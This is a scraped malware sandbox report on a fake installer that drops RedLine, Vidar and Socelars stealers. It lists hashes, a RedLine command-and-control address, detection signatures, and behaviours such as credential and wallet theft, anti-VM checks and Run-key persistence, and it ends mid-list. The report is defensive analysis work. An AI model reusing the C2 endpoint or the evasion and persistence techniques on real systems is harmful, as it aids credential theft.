Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
23-09-2021 21:08
210923-zyzyaafbfr 1022-09-2021 10:40
210922-mqyzssehck 1022-09-2021 05:21
210922-f114ksecck 1021-09-2021 05:29
210921-f6zspsgdg2 1020-09-2021 21:51
210920-1qj3jafed9 1020-09-2021 19:44
210920-yftswafca9 1020-09-2021 08:28
210920-kczcasgahr 1020-09-2021 04:42
210920-fb3acafedj 1020-09-2021 04:42
210920-fb2zksfecr 10Analysis
-
max time kernel
1802s -
max time network
1806s -
platform
windows11_x64 -
resource
win11 -
submitted
22-09-2021 10:40
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-de-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
4.0MB
-
MD5
73491325fde5366b31c09da701d07dd6
-
SHA1
a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
-
SHA256
56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
-
SHA512
28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88
Malware Config
Extracted
redline
janesam
65.108.20.195:6774
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6004 4792 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4804 4792 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6116 4792 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5536 4792 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule behavioral4/memory/5052-280-0x00000000069C0000-0x00000000069DD000-memory.dmp family_redline -
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun19262b9e49ad.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun19262b9e49ad.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 24 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.exeWerFault.exeWerFault.exedescription pid process target process PID 5704 created 3572 5704 WerFault.exe Sun19de8ff4b6aefeb8.exe PID 5820 created 4660 5820 WerFault.exe Sun1908b94df837b3158.exe PID 5840 created 4628 5840 WerFault.exe Sun19eb40faaaa9.exe PID 5560 created 6084 5560 WerFault.exe 2.exe PID 4528 created 1168 4528 WerFault.exe ultramediaburner.exe PID 4148 created 6108 4148 WerFault.exe rundll32.exe PID 4652 created 5316 4652 WerFault.exe 5.exe PID 5560 created 4688 5560 WerFault.exe setup.exe PID 6008 created 5212 6008 WerFault.exe udptest.exe PID 668 created 5252 668 WerFault.exe rundll32.exe PID 2984 created 1432 2984 WerFault.exe GcleanerEU.exe PID 3620 created 2032 3620 WerFault.exe gcleaner.exe PID 5164 created 5632 5164 WerFault.exe Conhost.exe PID 7012 created 1368 7012 WerFault.exe DVqoN_M2hyOJuqKLhZl3Zhf2.exe PID 7072 created 6336 7072 WerFault.exe DyzW75Vg9OFYpumqyTL2gvjP.exe PID 876 created 2948 876 YZb540BezbbpKeaGGc138FrF.exe PID 6456 created 1956 6456 WerFault.exe m1dOwok5aPcrur45Ch_l6GVs.exe PID 5508 created 5288 5508 WerFault.exe 98zXQtfds9_B8K1wkYwThy5h.exe PID 4904 created 6228 4904 WerFault.exe tmpCD2_tmp.exe PID 2268 created 6096 2268 WerFault.exe 5cyMyMfaTHF5mm4GGWje7aCw.exe PID 1296 created 3388 1296 WerFault.exe explorer.exe PID 6452 created 6324 6452 powershell.exe ynpFKcNZI9p6eFlM1OP158SD.exe PID 1336 created 6208 1336 WerFault.exe f8PpilxAOrTr28KiG99opgqy.exe PID 6996 created 6344 6996 WerFault.exe rundll32.exe -
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral4/memory/4628-283-0x0000000000A20000-0x0000000000AF4000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\libcurlpp.dll aspack_v212_v242 -
Blocklisted process makes network request 44 IoCs
Processes:
MsiExec.exepowershell.exeflow pid process 91 6116 MsiExec.exe 92 6116 MsiExec.exe 93 6116 MsiExec.exe 94 6116 MsiExec.exe 97 6116 MsiExec.exe 98 6116 MsiExec.exe 104 6116 MsiExec.exe 105 6116 MsiExec.exe 106 6116 MsiExec.exe 107 6116 MsiExec.exe 108 6116 MsiExec.exe 109 6116 MsiExec.exe 110 6116 MsiExec.exe 111 6116 MsiExec.exe 113 6116 MsiExec.exe 114 6116 MsiExec.exe 115 6116 MsiExec.exe 116 6116 MsiExec.exe 117 6116 MsiExec.exe 118 6116 MsiExec.exe 119 6116 MsiExec.exe 120 6116 MsiExec.exe 121 6116 MsiExec.exe 122 6116 MsiExec.exe 123 6116 MsiExec.exe 125 6116 MsiExec.exe 157 6116 MsiExec.exe 159 6116 MsiExec.exe 163 6116 MsiExec.exe 175 6116 MsiExec.exe 179 6116 MsiExec.exe 181 6116 MsiExec.exe 187 6116 MsiExec.exe 194 6116 MsiExec.exe 201 6116 MsiExec.exe 204 6116 MsiExec.exe 213 6116 MsiExec.exe 218 6116 MsiExec.exe 220 6116 MsiExec.exe 221 6116 MsiExec.exe 224 6116 MsiExec.exe 226 6116 MsiExec.exe 228 6116 MsiExec.exe 229 7132 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
Ze2ro.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts Ze2ro.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeSun193fda712d9f1.exeSun1917b8fb5f09db8.exeSun19262b9e49ad.exeSun19de8ff4b6aefeb8.exesetup_2.exeSun198361825f4.exeSun1905815e51282417.exeSun1908b94df837b3158.exeSun19eb40faaaa9.exeSun191101c1aaa.exeSun195a1614ec24e6a.exeSun1966fb31dd5a07.exeSun1966fb31dd5a07.tmpZe2ro.exeLzmwAqmV.exeChrome 5.exePublicDwlBrowser1100.exe2.exesetup.exeudptest.exe5.exeLivelyScreenRecF18.exe3002.exesetup_2.tmpjhuuee.exesetup_2.exeBearVpn 3.exesetup_2.tmp3002.exeultramediaburner.exeultramediaburner.tmpLeboberaeha.exeTobabawehy.exeUltraMediaBurner.exeinstaller.exeGcleanerEU.exeanyname.exegcleaner.exeautosubplayer.exeservices64.exem1dOwok5aPcrur45Ch_l6GVs.exeg4sLH6CA5afgxnFDnbN6julV.exeDVqoN_M2hyOJuqKLhZl3Zhf2.exeUZE7zKuIOHTqCGibtYD11gl4.exeUqeNeCzEYzHh_NzaAB2UgDsH.exe5cyMyMfaTHF5mm4GGWje7aCw.exei_mtShrQKXhCFkurByO6l9wD.exeYZb540BezbbpKeaGGc138FrF.exeQSydSxCGLaGDRZ1oU1LJVgeo.exe98zXQtfds9_B8K1wkYwThy5h.exel6unBCJnlLRYEZSAupPv3hRP.exeKj_AL68Sdj9h6SyuSSPAb3y6.exeAshFb0VOpmlvVISw0CGgF3Vv.exetmpCD2_tmp.exeDyzW75Vg9OFYpumqyTL2gvjP.exemsSZ2vyO5kijQfy3iLE0ayRx.exenKgSrPTMItcaLsJo4r1XrMq6.exeConhost.execm3.exeDyzW75Vg9OFYpumqyTL2gvjP.exemd8_8eus.exepid process 4988 setup_installer.exe 4436 setup_install.exe 5032 Sun193fda712d9f1.exe 1124 Sun1917b8fb5f09db8.exe 1168 Sun19262b9e49ad.exe 3572 Sun19de8ff4b6aefeb8.exe 3068 setup_2.exe 4188 Sun198361825f4.exe 4248 Sun1905815e51282417.exe 4660 Sun1908b94df837b3158.exe 4628 Sun19eb40faaaa9.exe 3908 Sun191101c1aaa.exe 5052 Sun195a1614ec24e6a.exe 5048 Sun1966fb31dd5a07.exe 5188 Sun1966fb31dd5a07.tmp 5496 Ze2ro.exe 5752 LzmwAqmV.exe 5928 Chrome 5.exe 5976 PublicDwlBrowser1100.exe 6084 2.exe 4688 setup.exe 5212 udptest.exe 5316 5.exe 5524 LivelyScreenRecF18.exe 3068 setup_2.exe 5336 3002.exe 4600 setup_2.tmp 6056 jhuuee.exe 5852 setup_2.exe 4496 BearVpn 3.exe 2236 setup_2.tmp 5760 3002.exe 1168 ultramediaburner.exe 5348 ultramediaburner.tmp 6124 Leboberaeha.exe 5408 Tobabawehy.exe 4928 UltraMediaBurner.exe 1284 installer.exe 1432 GcleanerEU.exe 2440 anyname.exe 2032 gcleaner.exe 5432 autosubplayer.exe 2416 services64.exe 1956 m1dOwok5aPcrur45Ch_l6GVs.exe 4804 g4sLH6CA5afgxnFDnbN6julV.exe 1368 DVqoN_M2hyOJuqKLhZl3Zhf2.exe 936 UZE7zKuIOHTqCGibtYD11gl4.exe 5196 UqeNeCzEYzHh_NzaAB2UgDsH.exe 6096 5cyMyMfaTHF5mm4GGWje7aCw.exe 1724 i_mtShrQKXhCFkurByO6l9wD.exe 2948 YZb540BezbbpKeaGGc138FrF.exe 5344 QSydSxCGLaGDRZ1oU1LJVgeo.exe 5288 98zXQtfds9_B8K1wkYwThy5h.exe 1704 l6unBCJnlLRYEZSAupPv3hRP.exe 4544 Kj_AL68Sdj9h6SyuSSPAb3y6.exe 2832 AshFb0VOpmlvVISw0CGgF3Vv.exe 6228 tmpCD2_tmp.exe 6336 DyzW75Vg9OFYpumqyTL2gvjP.exe 6352 msSZ2vyO5kijQfy3iLE0ayRx.exe 6408 nKgSrPTMItcaLsJo4r1XrMq6.exe 6696 Conhost.exe 6808 cm3.exe 6876 DyzW75Vg9OFYpumqyTL2gvjP.exe 6928 md8_8eus.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exemsSZ2vyO5kijQfy3iLE0ayRx.exe210921.exeA85B.exeC2AB.exeKj_AL68Sdj9h6SyuSSPAb3y6.exei_mtShrQKXhCFkurByO6l9wD.exeUZE7zKuIOHTqCGibtYD11gl4.exeDone.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion msSZ2vyO5kijQfy3iLE0ayRx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 210921.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion A85B.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C2AB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Kj_AL68Sdj9h6SyuSSPAb3y6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion i_mtShrQKXhCFkurByO6l9wD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 210921.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C2AB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UZE7zKuIOHTqCGibtYD11gl4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Done.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion msSZ2vyO5kijQfy3iLE0ayRx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Done.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion A85B.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Kj_AL68Sdj9h6SyuSSPAb3y6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UZE7zKuIOHTqCGibtYD11gl4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion i_mtShrQKXhCFkurByO6l9wD.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeSun1966fb31dd5a07.tmpsetup_2.tmprundll32.exesetup_2.tmprundll32.exeinstaller.exeautosubplayer.exeConhost.exeMsiExec.exeMsiExec.exeMsiExec.exel6unBCJnlLRYEZSAupPv3hRP.exerundll32.exerundll32.exeKj_AL68Sdj9h6SyuSSPAb3y6.exerundll32.exerundll32.exepid process 4436 setup_install.exe 4436 setup_install.exe 4436 setup_install.exe 4436 setup_install.exe 4436 setup_install.exe 5188 Sun1966fb31dd5a07.tmp 4600 setup_2.tmp 6108 rundll32.exe 2236 setup_2.tmp 5252 rundll32.exe 1284 installer.exe 1284 installer.exe 5432 autosubplayer.exe 1284 installer.exe 5632 Conhost.exe 5776 MsiExec.exe 5776 MsiExec.exe 5432 autosubplayer.exe 6116 MsiExec.exe 6116 MsiExec.exe 6116 MsiExec.exe 6116 MsiExec.exe 6116 MsiExec.exe 6116 MsiExec.exe 6116 MsiExec.exe 6116 MsiExec.exe 6116 MsiExec.exe 6116 MsiExec.exe 1284 installer.exe 6116 MsiExec.exe 6116 MsiExec.exe 5432 autosubplayer.exe 5432 autosubplayer.exe 6060 MsiExec.exe 6060 MsiExec.exe 6116 MsiExec.exe 5432 autosubplayer.exe 5432 autosubplayer.exe 5432 autosubplayer.exe 5432 autosubplayer.exe 5432 autosubplayer.exe 1704 l6unBCJnlLRYEZSAupPv3hRP.exe 5432 autosubplayer.exe 1596 rundll32.exe 6344 rundll32.exe 4544 Kj_AL68Sdj9h6SyuSSPAb3y6.exe 4544 Kj_AL68Sdj9h6SyuSSPAb3y6.exe 4544 Kj_AL68Sdj9h6SyuSSPAb3y6.exe 5432 autosubplayer.exe 5432 autosubplayer.exe 5432 autosubplayer.exe 5432 autosubplayer.exe 5432 autosubplayer.exe 5432 autosubplayer.exe 5432 autosubplayer.exe 5432 autosubplayer.exe 3404 rundll32.exe 6644 rundll32.exe 5432 autosubplayer.exe 5432 autosubplayer.exe 5432 autosubplayer.exe 5432 autosubplayer.exe 5432 autosubplayer.exe 5432 autosubplayer.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
Ze2ro.exemsedge.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\UltraMediaBurner\\Liwerupuva.exe\"" Ze2ro.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Done.exe210921.exemd8_8eus.exeA85B.exeC2AB.exeUZE7zKuIOHTqCGibtYD11gl4.exemsSZ2vyO5kijQfy3iLE0ayRx.exei_mtShrQKXhCFkurByO6l9wD.exeKj_AL68Sdj9h6SyuSSPAb3y6.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Done.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 210921.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA A85B.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C2AB.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA UZE7zKuIOHTqCGibtYD11gl4.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA msSZ2vyO5kijQfy3iLE0ayRx.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA i_mtShrQKXhCFkurByO6l9wD.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Kj_AL68Sdj9h6SyuSSPAb3y6.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
installer.exemsiexec.exemsiexec.exeInstall.exedescription ioc process File opened (read-only) \??\U: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Z: Install.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\B: installer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 132 ipinfo.io 177 ipinfo.io 216 ipinfo.io 2 ip-api.com 25 ipinfo.io 54 ipinfo.io -
Drops file in System32 directory 6 IoCs
Processes:
rundll32.exeInstall.exeInstall.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
Processes:
UZE7zKuIOHTqCGibtYD11gl4.exemsSZ2vyO5kijQfy3iLE0ayRx.exei_mtShrQKXhCFkurByO6l9wD.exeDone.exe210921.exeA85B.exeC2AB.exeKj_AL68Sdj9h6SyuSSPAb3y6.exepid process 936 UZE7zKuIOHTqCGibtYD11gl4.exe 6352 msSZ2vyO5kijQfy3iLE0ayRx.exe 1724 i_mtShrQKXhCFkurByO6l9wD.exe 7048 Done.exe 6992 210921.exe 5484 A85B.exe 4920 C2AB.exe 4544 Kj_AL68Sdj9h6SyuSSPAb3y6.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
DyzW75Vg9OFYpumqyTL2gvjP.exeservices64.exeUqeNeCzEYzHh_NzaAB2UgDsH.exetmpCD2_tmp.exedescription pid process target process PID 6336 set thread context of 6876 6336 DyzW75Vg9OFYpumqyTL2gvjP.exe DyzW75Vg9OFYpumqyTL2gvjP.exe PID 2416 set thread context of 1252 2416 services64.exe explorer.exe PID 2400 set thread context of 5196 2400 UqeNeCzEYzHh_NzaAB2UgDsH.exe UqeNeCzEYzHh_NzaAB2UgDsH.exe PID 6228 set thread context of 6720 6228 tmpCD2_tmp.exe tmpCD2_tmp.exe -
Drops file in Program Files directory 64 IoCs
Processes:
autosubplayer.exedata_load.exeg4sLH6CA5afgxnFDnbN6julV.exepowershell.exemd8_8eus.exeultramediaburner.tmpUqeNeCzEYzHh_NzaAB2UgDsH.exelighteningplayer-cache-gen.exedescription ioc process File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll autosubplayer.exe File opened for modification C:\Program Files\temp_files\JFLQwz.dll data_load.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\03_lastfm.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\liblogger_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_a52_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\offset_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\dkjson.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll autosubplayer.exe File opened for modification C:\Program Files\temp_files\cache.dat data_load.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_cdg_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\librss_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe g4sLH6CA5afgxnFDnbN6julV.exe File opened for modification C:\Program Files (x86)\JFLQwz\JFLQwz.dll powershell.exe File opened for modification C:\Program Files\temp_files\ autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\regstr autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\cue.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libdummy_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsc_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libattachment_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libasf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsfsstorage_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File created C:\Program Files (x86)\UltraMediaBurner\is-61P49.tmp ultramediaburner.tmp File created C:\Program Files (x86)\lighteningplayer\lua\http\vlm_export.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.json autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_concat_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\UltraMediaBurner\is-PNNBN.tmp ultramediaburner.tmp File created C:\Program Files (x86)\lighteningplayer\libvlc.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemuxdump_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cm3.exe g4sLH6CA5afgxnFDnbN6julV.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst001.exe g4sLH6CA5afgxnFDnbN6julV.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe UqeNeCzEYzHh_NzaAB2UgDsH.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac autosubplayer.exe 